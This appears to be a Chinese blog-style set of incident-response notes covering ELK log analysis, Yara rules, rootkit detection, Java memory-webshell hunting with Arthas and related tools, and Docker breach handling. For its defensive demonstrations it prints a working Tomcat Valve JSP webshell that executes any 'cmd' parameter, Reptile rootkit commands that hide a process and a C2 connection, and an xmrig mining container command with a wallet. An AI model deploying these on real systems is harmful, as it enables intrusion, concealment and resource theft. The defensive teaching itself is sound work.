应急响应-工具-ELK日志分析系统与Yara规则识别样本 ELK日志分析系统Elasticsearch：用于存储收集到的日志信息Logstash：用于收集日志，SpringBoot应用整合了Logstash以后会把日志发送给Logstash，Logstash再把日志转发给ElasticsearchKibana：通过Web端的可视化界面来查看日志很多日志分析的应用都不够全面，ELK解决了很多不完善的地方，是蓝队日志分析的一个好工具，是一个外国的产品，在系统下搭建很麻烦，很容易出错，如果只是日常使用，方便了解，建议在docker下搭建，如果是实战，建议在系统下搭建，毕竟docker只是个虚拟容器。环境搭建使用的Docker镜像sebp/elk:793注意该容器使用的内存大约在2.1G左右服务器需要安装Docker、Docker-compose这个镜像是Elasticsearch、Logstash、Kibana集成容器镜像，使用docker或者docker-compose启动后各个组件就会启动成功apt update apt install docker apt install docker-compose # 设置一个进程可以拥有的VMA(虚拟内存区域)的数量 sysctl -w vm.max_map_count=262144 # 使上个命令立即生效 sysctl -p 如果有出现vm.max_map_count = 262144说明设置成功vim docker-compose.yml # 文件内容 version: "3.5" services: elk: image: sebp/elk:7.12.0 volumes: - ./elk/02-beats-input.conf:/etc/logstash/conf.d/02-beats-input.conf environment: ES_JAVA_OPTS: -Xms512m -Xmx512m ports: #Kibana 网络界面 - "5601:5601" # Elasticsearch JSON 接口 - "9200:9200" # Logstash Beats 接口 - "5044:5044"在docker-compose.yml文件目录下创建elk文件夹，创建Logstash配置文件02-beats-input.conf#进入elk目录 cd elk #创建并编辑02-beats-input.conf文件 vi 02-beats-input.confinput { tcp { port => 5044 codec => json_lines } } output{ elasticsearch { hosts => ["localhost:9200"] index => "beat-%{+YYYY.MM.dd}" } }docker-compose up -d elk上传日志文件解析特定部署采集分析恶意样本Yara分析Yara工具地址GitHub - VirusTotal/yara: The pattern matching swiss knife恶意样本库GitHub - ytisf/theZoo: A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public.相关开源的检测规则GitHub - Yara-Rules/rules: Repository of yara ruleshttps://github.com/JerryLinLinLin/Huorong-ATP-Ruleshttps://github.com/m-sec-org/d-eyes/tree/master/yaraRules规则分类Antidebug_AntiVM：反调试/反沙箱类yara规则Crypto：加密类yara规则CVE_Rules：CVE漏洞利用类yara规则email：恶意邮件类yara规则Exploit-Kits：EK类yara规则Malicious_Documents：恶意文档类yara规则malware：恶意软件类yara规则Mobile_Malware：移动恶意软件类yara规则Packers：加壳类yara规则utils：通用类yara规则Webshells：Webshell类yara规则检测范围样本文件内存数据网络流量Yara规则开发参考文章YARA规则与办公安全：高效检测策略Yara规则内容支持字符串、正则表达式、十六进制进行匹配特征规则：字符串：定义一个变量 $a = "字符串内容"正则表达式：定义一个变量 $a = /正则表达式内容/十六进制：定义一个变量 $a = {十六进制内容}条件规则：and：与 or：或 not：非all of them：所有条件匹配即告警any of them：有一个条件匹配即告警$a and $b and $c：abc同时匹配即告警($a and $b) or $c：匹配a和b或c即告警Yara规则常用修饰符：nocase：不区分大小写base64：base64字符串xor：异或字符串wide：宽字符如何进行特征提取通过多个样本的对比来找出共同点特征通过分析协议、文件头等来找出特征实例展示利用已知规则测试识别挖矿、勒索、C2、WebShellyara64.exe rules\malware_index.yar -r example利用已知规则测试识别算法yara64.exe rules\crypto_index.yar -r example利用已知规则测试识别加壳yara64.exe rules\packers_index.yar -r example利用已知规则测试识别反沙箱yara64.exe rules\antidebug_antivm_index.yar -r example自写规则识别恶意软件-测试（并不能进行实际识别）rule xmrig_find : miner { meta: author = "ElmWhite" date = "2025-02-20" strings: $hex = {4D 5A} $a = "stratum" $b = "xmrig" $c = "pool" condition: all of them } 自写规则识别内存马rule mem_find : memshell { meta: author = "ElmWhite" date = "2024-09-05" strings: $a = "org.apache.coyote.type.MapLikeType" $b = "org.apache.coyote.deser" $c = "org.apache.coyote.exc" condition: ($a and $b) or $c }yara64.exe rules\mem_find.yar PID

应急响应-Rookit后门查杀 Rookit和内存马的区别内存马一般是作为控制网站的webshell的进一步权限维持，而Rookit一般是用来控制服务器隐藏常规C2后门的权限维持手法。Rookit常规隐藏手法-Windows我们知道常规C2后门的排查手法就是通过网络连接、进程排查进行分析定性，那么Rookit可以做到哪些方面的隐藏呢？Rookit可以隐藏进程，隐藏网络连接，同时它还可以隐藏文件，让蓝队成员无法排查到这个C2后门的所在。隐藏进程隐藏网络连接隐藏文件应急处理方法碰运气-使用对应Rookit的卸载文件进行卸载常规手法-火绒剑看隐藏的进程可以看到火绒剑可以看到隐藏的进程，而其他的一些工具无法看到隐藏的进程通过进程PID我们可以直接结束该进程常规手法-通过Unhide工具查看隐藏的进程和端口unhide上面的条件仅仅只有进程的PID对我们有点用，本地隐藏的端口是没什么用的，因为我们不知道连接的C2服务端以及服务端开放连接的端口，所以说这个条件除非我们卸载了Rookit看到网络连接才能正确的封禁IP和端口，不然基本没用通过PID我们可以将进程结束掉，从而防止危害进一步扩大。（这边我们尝试通过cmd的结束进程命令来结束恶意进程似乎不行，提示未找到PID，最好还是火绒剑结束比较稳妥）Rookit常规隐藏手法-LinuxGitHub - f0rb1dd3n/Reptile: LKM Linux rootkit隐藏进程/reptile/reptile_cmd hide 5803隐藏网络连接/reptile/reptile_cmd tcp 114.55.115.6 4444应急处理方法常规方法-通过Unhide工具查看隐藏sudo apt-get install unhideunhide proc通过kill命令即可清除运行的后门进程至于网络端口只能发现本地的端口，其实没啥用，所以就不演示了，具体的使用方法可以自己体验补充：Linux杀软-clamavLinux病毒扫描工具：ClamAVClam AntiVirus是一个类UNIX系统上使用的反病毒软件包。主要应用于邮件服务器，采用多线程后台操作，可以自动升级病毒库。ClamAV是一个在命令行下查毒软件，因为它不将杀毒作为主要功能，默认只能查出您计算机内的病毒，但是无法清除。

应急响应-Spring框架内存马查杀与其他补充内存马 Tomcat-Valve内存马哥斯拉不支持该类型内存马植入，只能用脚本方式植入<%@ page import="java.lang.reflect.Field" %> <%@ page import="org.apache.catalina.connector.Request" %> <%@ page import="org.apache.catalina.valves.ValveBase" %> <%@ page import="org.apache.catalina.connector.Response" %> <%@ page import="java.io.IOException" %> <%@ page import="org.apache.catalina.core.*" %> <%@ page import="java.io.InputStream" %> <%@ page import="java.util.Scanner" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> <% Field requestField = request.getClass().getDeclaredField("request"); requestField.setAccessible(true); final Request request1 = (Request) requestField.get(request); StandardContext standardContext = (StandardContext) request1.getContext(); Field pipelineField = ContainerBase.class.getDeclaredField("pipeline"); pipelineField.setAccessible(true); StandardPipeline standardPipeline1 = (StandardPipeline) pipelineField.get(standardContext); ValveBase valveBase = new ValveBase() { @Override public void invoke(Request request, Response response) throws ServletException,IOException { if (request.getParameter("cmd") != null) { boolean isLinux = true; String osTyp = System.getProperty("os.name"); if (osTyp != null && osTyp.toLowerCase().contains("win")) { isLinux = false; } String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")}; InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); Scanner s = new Scanner(in).useDelimiter("\\A"); String output = s.hasNext() ? s.next() : ""; response.getWriter().write(output); response.getWriter().flush(); this.getNext().invoke(request, response); } } }; standardPipeline1.addValve(valveBase); out.println("evil valve inject done!"); %>尝试通过scanner脚本查杀，发现脚本已经无法正常打开了通过GUI工具进行查杀分析成功找到对应的Valve内存马，可进行查杀通过Arthas工具进行分析sc * | grep valve jad --source-only org.apache.jsp.valve_jsp总结无法通过scanner脚本进行分析，有别于传统的内存马查杀方式，传统内存马这三种都可以，但是遇到这种类型就没法通过scanner脚本查杀，得通过GUI工具或者Arthas进行分析定性。Spring框架内存马Spring Controller型内存马：动态注册Controller及映射路由。Spring Interceptor型内存马：动态注册Interceptor及映射路由。Spring Webflux型内存马：动态注册WebFilter及映射路由。遇到框架型的内存马，我们就没法通过scanner脚本，GUI工具来进行查杀了，我们只能通过Arthas工具进行分析。因为这些SpringBoot框架启动基本都是jar包启动，不放在Tomcat下，我们的scanner脚本基本派不上用场。Controller型&Interceptor型内存马通过Arthas排查sc * | grep Controllerjad --source-only com.example.springinject.demos.web.myInjectController3sc * | grep InterceptorWebflux型内存马先行在靶场植入内存马，尝试通过哥斯拉进行连接通过Arthas排查sc * | grep Webflux在这种情况出现的时候，我们就得换一种方式了，通过内存马的常见关键字进行筛查：memshellshellosruntime.......jad --source-only com.example.webfluxmem.WebFluxFilterMemshell这种也是没办法的办法，如果攻击者换一种的话基本就查不出来了，所以说内存马的查杀还是很有门道的，目前针对这种情况我没有很好的解决方案，要是有其他方法可以告知我。如何清除内存马上面我们在内存中分析定性了内存马是哪些类文件，而这些类文件又不像Tomcat有文件目录，他们都在jar包中，我们要怎么进行清除呢？首先要先停止jar包的运行，然后通过压缩软件打开jar包删除恶意类重新启动之后就不存在内存马了蓝队排查思路总结此类方法纯属个人了解，如有遗漏请大家多多指正先进行资产的梳理，确认采用的组织架构，如：中间件（Tomcat）、开发框架（SpringBoot）等对应查找可能存在的内存马技术，如：Tomcat-Valve、Spring Controller型、传统内存马基于上述信息，我们可以确定我们要采用的分析工具，如：传统则都可用、Spring只能用Arthas等确认采用的分析工具之后进行分析定性，如：Arthas通过命令查找对应的后缀，jad查看反编译源码，dump文件分析定性等定性之后，通过脚本或者其他工具、手工进行内存马的清除最后重启服务观察内存马是否仍然存在待补充Tomcat其他类型（如Upgrade、Executor、Poller）的内存马：这些内存马会动态替换或添加全局组件。其他中间件（如Grizzly）的内存马：动态注册Filter及映射路由。其他内存马（特殊情况下才能实现植入）：WebSocket型内存马：动态注册WebSocket路由及处理逻辑。Tomcat JSP型内存马：动态注册Tomcat JSP管理逻辑并实现驻留。线程型内存马：启动一个无法被杀死的线程。RMI型内存马：动态启动一个RMI Registry。Agent型内存马：通过Hook并修改关键方法添加恶意逻辑。Agent型内存马在现代webshell管理工具中有广泛实现。

应急响应-传统Web内存马查杀 内存马是什么在Web安全领域，Webshell一直是一个非常重要且热门的话题。在目前传统安全领域，Webshell根据功能的不同分为三种类型，分别是：一句话木马，小马，大马。而根据现在防火墙技术的更新迭代，随后出现了加密的木马技术，比如：加密一句话。而我们今天要说的是一种新的无文件的Webshell类型：内存马。发展由来由于近几年防火墙，IDS，IPS，流量分析等各种安全设备的普及和更新，这种传统连接方式非常容易被设备捕获拦截，而且由于文件是明文存放在服务器端，所以又很容易被杀毒软件所查杀。在今天看来这种传统连接方式显然已经过时，于是乎，进化了一系列的加密一句话木马，但是这种方式还是不能绕过有类似文件监控的杀毒软件，于是乎进化了新一代的Webshell ---> 内存马内存马原理内存马是无文件Webshell，什么是无文件webshell呢？简单来说，就是服务器上不会存在需要链接的webshell脚本文件。这种方式为什么能链接呢？内存马的原理就像是MVC架构，即通过路由访问控制器内存马的原理就是在web组件或者应用程序中，注册一层访问路由，访问者通过这层路由，来执行我们控制器中的代码内存马类型PHPJavaPythonASPX传统Java内存马查杀在内存马的家族中，Java内存马是目前涉及面最广技巧最多，方式最多的，所以我们这篇着重讲一下Java内存马在Tomcat中间件中的查杀，像是Spring框架有着跟Tomcat不一样的内存马，所以我们分开讲。哥斯拉注入内存马首先启动一个Tomcat环境，然后让哥斯拉来注入内存马内存注入之后是不存在文件的，仅有一个路由，它是无文件落地的。那么怎么查杀内存马呢？这时候我们可以利用一些别人写好的脚本来进行查杀https://github.com/c0ny1/java-memshell-scanner/tree/master将对应的scanner.jsp放到网站目录下，进行访问可以看到当我们注入内存马之后，这边是检测到了没有对应的文件，我们去目录看下同样也是没有对应的文件存在的，直接通过哥斯拉连接内存马通过脚本清除内存马脚本提示我们这个路由可能是内存马，通过脚本kill这两个路由可以看到哥斯拉无法连接了通过Java诊断利器 Arthas 分析定性内存马GitHub - alibaba/arthas: Alibaba Java Diagnostic Tool Arthas/Alibaba Java诊断利器ArthasArthas 为一款监控诊断产品，通过全局视角实时查看应用load、内存、gc、线程的状态信息。可使用该工具对内存马排查和分析，如攻击者隐藏的深的话，可将所有的类都反编译导出来然后逐一排查。java -jar arthas-boot.jar可以看到一个是哥斯拉的进程，另一个就是Tomcat中间件在运行，我们当然选择分析Tomcat了查看URL路由mbean | grep "name=/"sc查看JVM 已加载的类信息sc *.Filtersc *.Servlet那这么多类我们要怎么分析出哪一个是内存马呢？通过对这些类的搜索，可以初步判断哪些可信，哪些不可信那么我们如何进一步定性这个类是内存马呢？dump类反编译定性内存马dump org.apache.coyote.ext.Java7Support这时候就得通过dump文件来进行分析了，dump出来的是class文件，我们通过IDEA打开即可获取到反编译版本的代码，这时候如果你的代码功底比较扎实的话，你就可以进行审计判断。那可能你的代码功底不是很扎实该咋办？保存代码为.java文件上传微步即可补充：jad在线反编译类jad --source-only org.apache.coyote.ext.Java7Support补充：通过web日志进行分析查看中间件的日志，如果存在请求那种没有具体文件的路由，但是返回值或者返回长度过长的请求包，那么就有可能是注入内存马的路由使用脚本或者工具清除内存马使用我们前面提到的scanner.jsp脚本清除内存马或者这个综合工具进行清除GitHub - 4ra1n/shell-analyzer: 通过 JAVA AGENT 查杀内存马，提供简易方便的 GUI 界面，一键反编译目标环境内存马进行分析，支持远程查杀和本地查杀（注意：仅供本地复现分析学习，请勿用于正式和生产环境）通过选中双击即可反编译Listener内存马Listener内存马无法通过哥斯拉直接植入，因为哥斯拉不支持这种类型的内存马植入，所以我们得通过其他方式来植入Listener内存马。遇到这种内存马通过上面的scanner.jsp脚本可以进行清除，同时通过GUI图形化界面也可以进行清除还有我们的内存分析工具Arthas也可以进行定性sc * | grep Listenerjad --source-only ch.qos.logback.ServletRequestWhnListener

应急响应-Docker容器应急 前言目前docker容器搭建数据库或者一些常见的服务已经成为常态，但同时也提升了docker易受到攻击的可能性，当docker被攻击导致权限丢失，或者说被植入了恶意程序，我们要如何进行应急响应呢？挖矿容器应急top判断是否挖矿docker run -itd --restart=always -e POOL_URL=pool.supportxmr.com:5555 -e POOL_USER=45rfqYG9iNPddvenLpjFskJUhFgqBkdhDeah3X8D8ZJM3KpKqZWCLz3ewLsVd269tZiEyQRV53Ldv2DJb6xeuFokF7SBb1p --name xmrig pmietlicki/xmrigtop查看对应xmrig的进程ps -aux | grep xmrig发现kill进程之后仍然存在看到命令是当前目录下执行，可是我们并没有xmrig这个文件，那么到底在哪执行的？判断存在权限维持技术，但是我们在top命令中看到了systemd这个进程，说明存在docker容器查看容器历史命令那么我们可以看看docker容器也没有docker psdocker history pmietlicki/xmrig发现里面确实有xmrig（门罗币挖矿）这个关键字，说明很可能是这个容器在运行挖矿程序使用dfimage从镜像中提取Dockerfilealias dfimage="docker run --rm -v /var/run/docker.sock:/var/run/docker.sock alpine/dfimage"dfimage -sV=1.36 pmietlicki/xmrig在这里可以清晰地看到恶意镜像构建的过程拿到钱包地址查看镜像的配置信息docker inspect --format='{{json .Config}}' pmietlicki/xmrig实锤恶意文件docker exec -it 566b0075a5eb /bin/bash发现确实存在这个文件，我们将文件取出来docker cp 566b0075a5eb:/home/miner/xmrig/build/xmrig .实锤是门罗币挖矿程序应急处置进入docker删除恶意程序，然后kill进程，排查权限维持即可。根据上述的内容将分析定性的过程与应急处置的流程整合即可输出报告docker inspect --format='{{.GraphDriver.Data.LowerDir}}' pmietlicki/xmrigWeb后门应急git clone https://github.com/vulhub/vulhub.git cd struts2/s2-046/ docker-compose build docker compose up -d上传哥斯拉JSP后门在这时候告警给蓝队成员，如何快速定性web后门，然后清除后门呢？对web目录进行扫描docker cp hm 4561089630e6:/tmp/hm-linux-amd64 #河马查杀脚本通过哥斯拉可知网站根目录为/usr/src，直接通过河马扫描./hm-linux-amd64 scan /usr/src/定性存在webshell应急处置rm删除后门文件即可对docker容器进行基线检查GitHub - aquasecurity/trivy: Find vulnerabilities, misconfigurations, secrets, SBOM in containers, Kubernetes, code repositories, clouds and morewget https://github.com/aquasecurity/trivy/releases/download/v0.54.1/trivy_0.54.1_Linux-64bit.deb sudo dpkg -i trivy_0.54.1_Linux-64bit.deb # trivy image 容器名称(docker ps -a 获取) trivy image vulhub/shiro:1.2.4